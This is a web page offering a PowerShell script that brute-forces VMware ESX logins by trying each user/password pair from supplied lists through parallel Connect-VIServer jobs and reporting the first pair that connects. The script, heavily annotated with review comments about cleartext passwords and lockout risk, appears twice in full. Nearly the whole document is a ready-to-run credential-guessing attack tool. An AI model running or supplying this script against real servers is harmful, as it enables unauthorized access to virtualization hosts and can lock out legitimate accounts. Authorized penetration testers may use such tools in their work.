Brute Force ESX Username/Password
This script will brute force the connection to ESX. You can either give it a single username or a username file. Similarly, you can either give it a single password or a password file. You also have the ability to define how many jobs will run in parallel.
#———————————————————————————————
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#———————————————————————————————
#Parameter Declaration
# Script parameters.
#   -Server        : host handed to Connect-VIServer; prompted for with Read-Host when omitted.
#   -User          : single user name to try (not used when -UsersFile is given).
#   -Password      : single password to try (not used when -PasswordsFile is given).
#   -UsersFile     : file read with Get-Content; each line is one candidate user name.
#   -PasswordsFile : file read with Get-Content; each line is one candidate password.
#   -MaxJobs       : upper bound on the number of background jobs held at once (default 10).
# NOTE(review): -Password is a plain [string]; a value typed on the command line may
# end up in console history or in a session transcript if one is enabled - verify.
param (
[Parameter(Position=0)]
[string] $Server = $(Read-Host -prompt "Server"),
[Parameter(Mandatory=$false)]
[string] $User,
[Parameter(Mandatory=$false)]
[string] $Password,
[Parameter(Mandatory=$false)]
[string] $UsersFile,
[Parameter(Mandatory=$false)]
[string] $PasswordsFile,
[Parameter(Mandatory=$false)]
[int] $MaxJobs = 10
)
# Handle-Jobs: reap finished background jobs and report the first success.
# Every job in the session whose State is not "Running" is examined.
# Each job has a child job that actually does the work; if that child job's
# Error stream is empty the job is treated as a successful user/pass combo,
# the combo is printed, all jobs are stopped and removed, and the script exits.
# Any other finished job is removed so it stops counting toward MaxJobs.
# NOTE(review): the success test is only "no error recorded on ChildJobs[0]";
# the job's output and final State are not inspected, so a reported combo
# should be confirmed separately before it is treated as a finding.
# NOTE(review): Get-Job is unfiltered, so jobs started elsewhere in the same
# session are also examined, stopped and removed.
Function Handle-Jobs {
Get-Job | Where-Object {$_.State -ne "Running"} | ForEach-Object {
$job = $_
if (!$job.ChildJobs[0].Error) {
# Found one!
# Read the job's output and discard it; -Keep leaves the output on the job
Receive-Job $job -Keep | Out-Null
# Echo the user/pass combo stored in the job name.
# The job name is "User:<usr> Pass:<pass>", so this writes a cleartext
# password to the console (and to a transcript, if one is running).
echo "Found $($job.Name)"
# Clean up all the jobs, running or not
Get-Job | Stop-Job
Get-Job | Remove-Job
# Quit the whole script: only the first hit is ever reported
exit
}
# No success recorded for this job: drop it to free a slot
Remove-Job $job
}
}
# Make sure we have enough info passed in from the parameters:
# at least one source of user names and one source of passwords.
# NOTE(review): the messages say "UserFile"/"PasswordFile" while the actual
# parameters are -UsersFile and -PasswordsFile.
if (!$User -and !$UsersFile) {
throw "User or UserFile required."
}
if (!$Password -and !$PasswordsFile) {
throw "Password or PasswordFile required."
}
# If both the UsersFile and a User are provided then the UsersFile wins.
# Convert UsersFile or single User into an array so we can use a loop.
if ($UsersFile)
{
$Users = Get-Content $UsersFile
}
else
{
$Users = @($User)
}
# If both the PasswordsFile and a Password are provided then the PasswordsFile wins.
# Convert PasswordsFile or single Password into an array so we can use a loop.
if ($PasswordsFile)
{
$Passwords = Get-Content $PasswordsFile
}
else
{
$Passwords = @($Password)
}
# Outer loop over passwords, inner loop over users: every password/user pair
# in the two lists produces exactly one login attempt against $Server.
$Passwords | ForEach-Object {
$pass = $_
$Users | ForEach-Object {
$usr = $_
# If too many jobs are held then wait for some to complete.
# (Get-Job).Count includes finished jobs until Handle-Jobs removes them.
while ((Get-Job).Count -ge $MaxJobs) {
Handle-Jobs
Start-Sleep -Seconds 5
}
# Start the job to attempt the connection.
# Each job loads the VMware.VimAutomation.Core snap-in and makes a single
# Connect-VIServer call over https with this user/password pair.
# The job is named "User:<usr> Pass:<pass>" so Handle-Jobs can print the pair;
# as a side effect every candidate password is visible in cleartext in Get-Job.
# NOTE(review): nothing here spaces out attempts or caps them per account, so a
# run presumably appears on the target as a burst of failed logins from one
# source and can trigger account lockout where such a policy is enforced - verify.
Start-Job -InitializationScript {Add-PSSnapin VMware.VimAutomation.Core} -ScriptBlock { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass } -Name "User:$usr Pass:$pass" -ArgumentList $Server,$usr,$pass
}
}
# A bare string is written to the output stream as a status message
"Everything has been queued, waiting for jobs to complete"
# Wait for the jobs to complete: poll every 5 seconds until no jobs remain.
# If no job is ever judged successful the script ends here without printing
# a "not found" message.
Do {
Handle-Jobs
Start-Sleep -Seconds 5
} while (Get-Job)
#———————————————————————————————
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#———————————————————————————————
#Parameter Declaration
# Script parameters.
#   -Server        : host handed to Connect-VIServer; prompted for with Read-Host when omitted.
#   -User          : single user name to try (not used when -UsersFile is given).
#   -Password      : single password to try (not used when -PasswordsFile is given).
#   -UsersFile     : file read with Get-Content; each line is one candidate user name.
#   -PasswordsFile : file read with Get-Content; each line is one candidate password.
#   -MaxJobs       : upper bound on the number of background jobs held at once (default 10).
# NOTE(review): -Password is a plain [string]; a value typed on the command line may
# end up in console history or in a session transcript if one is enabled - verify.
param (
[Parameter(Position=0)]
[string] $Server = $(Read-Host -prompt "Server"),
[Parameter(Mandatory=$false)]
[string] $User,
[Parameter(Mandatory=$false)]
[string] $Password,
[Parameter(Mandatory=$false)]
[string] $UsersFile,
[Parameter(Mandatory=$false)]
[string] $PasswordsFile,
[Parameter(Mandatory=$false)]
[int] $MaxJobs = 10
)
# Handle-Jobs: reap finished background jobs and report the first success.
# Every job in the session whose State is not "Running" is examined.
# Each job has a child job that actually does the work; if that child job's
# Error stream is empty the job is treated as a successful user/pass combo,
# the combo is printed, all jobs are stopped and removed, and the script exits.
# Any other finished job is removed so it stops counting toward MaxJobs.
# NOTE(review): the success test is only "no error recorded on ChildJobs[0]";
# the job's output and final State are not inspected, so a reported combo
# should be confirmed separately before it is treated as a finding.
# NOTE(review): Get-Job is unfiltered, so jobs started elsewhere in the same
# session are also examined, stopped and removed.
Function Handle-Jobs {
Get-Job | Where-Object {$_.State -ne "Running"} | ForEach-Object {
$job = $_
if (!$job.ChildJobs[0].Error) {
# Found one!
# Read the job's output and discard it; -Keep leaves the output on the job
Receive-Job $job -Keep | Out-Null
# Echo the user/pass combo stored in the job name.
# The job name is "User:<usr> Pass:<pass>", so this writes a cleartext
# password to the console (and to a transcript, if one is running).
echo "Found $($job.Name)"
# Clean up all the jobs, running or not
Get-Job | Stop-Job
Get-Job | Remove-Job
# Quit the whole script: only the first hit is ever reported
exit
}
# No success recorded for this job: drop it to free a slot
Remove-Job $job
}
}
# Make sure we have enough info passed in from the parameters:
# at least one source of user names and one source of passwords.
# NOTE(review): the messages say "UserFile"/"PasswordFile" while the actual
# parameters are -UsersFile and -PasswordsFile.
if (!$User -and !$UsersFile) {
throw "User or UserFile required."
}
if (!$Password -and !$PasswordsFile) {
throw "Password or PasswordFile required."
}
# If both the UsersFile and a User are provided then the UsersFile wins.
# Convert UsersFile or single User into an array so we can use a loop.
if ($UsersFile)
{
$Users = Get-Content $UsersFile
}
else
{
$Users = @($User)
}
# If both the PasswordsFile and a Password are provided then the PasswordsFile wins.
# Convert PasswordsFile or single Password into an array so we can use a loop.
if ($PasswordsFile)
{
$Passwords = Get-Content $PasswordsFile
}
else
{
$Passwords = @($Password)
}
# Outer loop over passwords, inner loop over users: every password/user pair
# in the two lists produces exactly one login attempt against $Server.
$Passwords | ForEach-Object {
$pass = $_
$Users | ForEach-Object {
$usr = $_
# If too many jobs are held then wait for some to complete.
# (Get-Job).Count includes finished jobs until Handle-Jobs removes them.
while ((Get-Job).Count -ge $MaxJobs) {
Handle-Jobs
Start-Sleep -Seconds 5
}
# Start the job to attempt the connection.
# Each job loads the VMware.VimAutomation.Core snap-in and makes a single
# Connect-VIServer call over https with this user/password pair.
# The job is named "User:<usr> Pass:<pass>" so Handle-Jobs can print the pair;
# as a side effect every candidate password is visible in cleartext in Get-Job.
# NOTE(review): nothing here spaces out attempts or caps them per account, so a
# run presumably appears on the target as a burst of failed logins from one
# source and can trigger account lockout where such a policy is enforced - verify.
Start-Job -InitializationScript {Add-PSSnapin VMware.VimAutomation.Core} -ScriptBlock { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass } -Name "User:$usr Pass:$pass" -ArgumentList $Server,$usr,$pass
}
}
# A bare string is written to the output stream as a status message
"Everything has been queued, waiting for jobs to complete"
# Wait for the jobs to complete: poll every 5 seconds until no jobs remain.
# If no job is ever judged successful the script ends here without printing
# a "not found" message.
Do {
Handle-Jobs
Start-Sleep -Seconds 5
} while (Get-Job)

